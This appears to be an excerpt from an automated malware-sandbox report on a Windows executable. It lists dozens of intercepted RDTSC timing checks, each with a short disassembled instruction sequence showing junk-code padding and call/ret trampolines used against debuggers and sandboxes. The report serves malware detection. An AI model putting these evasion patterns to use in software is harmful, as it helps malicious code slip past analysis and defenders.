                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1072DC1 second address: 1072E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6644F246F6h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F6644F246E8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c xchg eax, ebx 0x0000002d push ebx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073345 second address: 1073349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073BAC second address: 1073BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F6644F246E6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073BC1 second address: 1073BCB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1073BCB second address: 1073BD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077743 second address: 1077749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1078202 second address: 1078206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077FEF second address: 1077FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077FF3 second address: 1077FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1078C8C second address: 1078C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1077FF7 second address: 1077FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107B408 second address: 107B445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F664452DAE1h 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F664452DAE0h 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DD61 second address: 102DD90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 ja 00007F6644F246E6h 0x0000000b popad 0x0000000c jmp 00007F6644F246ECh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6644F246F1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1079EFF second address: 1079F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F664452DAD6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DD90 second address: 102DDAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DDAE second address: 102DDB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 102DDB4 second address: 102DDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107E7BE second address: 107E836 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F664452DADEh 0x00000010 pop edx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F664452DAD8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov bh, cl 0x0000002e push 00000000h 0x00000030 jbe 00007F664452DADBh 0x00000036 sbb bx, BB63h 0x0000003b push 00000000h 0x0000003d jmp 00007F664452DAE5h 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107D86C second address: 107D872 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107D872 second address: 107D878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107D878 second address: 107D87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107E9E6 second address: 107E9EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107F989 second address: 107F98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 107E9EA second address: 107EA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jc 00007F664452DAEDh 0x0000000e jmp 00007F664452DAE7h 0x00000013 pop ecx 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+1245CAC6h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 movzx ebx, di 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c ja 00007F664452DADBh 0x00000032 mov ebx, 16E1258Fh 0x00000037 adc bx, 8F38h 0x0000003c mov eax, dword ptr [ebp+122D0E49h] 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007F664452DAD8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c mov dword ptr [ebp+1245CAC1h], ebx 0x00000062 push FFFFFFFFh 0x00000064 call 00007F664452DAE6h 0x00000069 add ebx, 19B7235Eh 0x0000006f pop edi 0x00000070 nop 0x00000071 push esi 0x00000072 push eax 0x00000073 push edx 0x00000074 jp 00007F664452DAD6h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082B20 second address: 1082B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082B24 second address: 1082B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082B2A second address: 1082B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082CD3 second address: 1082CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A86 second address: 1083A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082CD7 second address: 1082CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 108495E second address: 1084962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A8B second address: 1083A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1082CDB second address: 1082CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1084962 second address: 1084988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2ABAh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 cld 0x00000015 xchg eax, esi 0x00000016 jmp 00007F664452DADAh 0x0000001b push eax 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A91 second address: 1083A9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1084988 second address: 108498C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083A9F second address: 1083AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1083AA3 second address: 1083AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1086982 second address: 1086986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087A8B second address: 1087A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1088B12 second address: 1088BA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jne 00007F6644F246E6h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F6644F246E8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov bh, dh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F6644F246E8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a pushad 0x0000004b movzx eax, ax 0x0000004e mov dword ptr [ebp+122D217Ah], edx 0x00000054 popad 0x00000055 adc ebx, 118443FAh 0x0000005b xchg eax, esi 0x0000005c jmp 00007F6644F246F9h 0x00000061 push eax 0x00000062 pushad 0x00000063 pushad 0x00000064 pushad 0x00000065 popad 0x00000066 push eax 0x00000067 pop eax 0x00000068 popad 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087CDC second address: 1087CF8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F664452DADBh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1086B7C second address: 1086B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087CF8 second address: 1087CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087CFD second address: 1087D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1087D03 second address: 1087D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 1071179 second address: 10711F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F6644F246E6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F6644F246F0h 0x00000014 jc 00007F6644F246ECh 0x0000001a jg 00007F6644F246E6h 0x00000020 pop edi 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F6644F246E8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d jns 00007F6644F246F8h 0x00000043 nop 0x00000044 jmp 00007F6644F246EEh 0x00000049 push eax 0x0000004a pushad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8F45 second address: 10C8F4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F664452DAD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C8F4F second address: 10C8F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9AFE second address: 10C9B08 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F664452DAD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9B08 second address: 10C9B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9B0D second address: 10C9B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F664452DAD6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10C9B1E second address: 10C9B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CCDB1 second address: 10CCDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC530 second address: 10CC534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC534 second address: 10CC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC53A second address: 10CC540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC540 second address: 10CC545 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC6C5 second address: 10CC6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC6CB second address: 10CC6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10CC6DF second address: 10CC6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F63 second address: 10D5F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F67 second address: 10D5F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F6D second address: 10D5F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5F73 second address: 10D5FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F6644F246F8h 0x00000013 jmp 00007F6644F246F0h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D408C second address: 10D4090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D4090 second address: 10D4096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D4096 second address: 10D40A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F664452DAD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D40A0 second address: 10D40A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D40A4 second address: 10D40BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DADEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D43F0 second address: 10D43FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6644F246E6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D43FC second address: 10D4401 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D4401 second address: 10D4413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnp 00007F6644F246E6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D49D1 second address: 10D49D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D49D5 second address: 10D49DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5050 second address: 10D506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F664452DAE9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D506F second address: 10D5074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D534E second address: 10D5353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5353 second address: 10D5359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5359 second address: 10D535F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D535F second address: 10D536E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F6644F246EEh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5689 second address: 10D568D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D568D second address: 10D5693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5693 second address: 10D56B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D56B3 second address: 10D56B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D595F second address: 10D5967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5967 second address: 10D596D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D596D second address: 10D598E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F664452DAD8h 0x0000000d je 00007F664452DADAh 0x00000013 js 00007F664452DADEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5C35 second address: 10D5C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 10D5C4F second address: 10D5C5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F664452DAD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
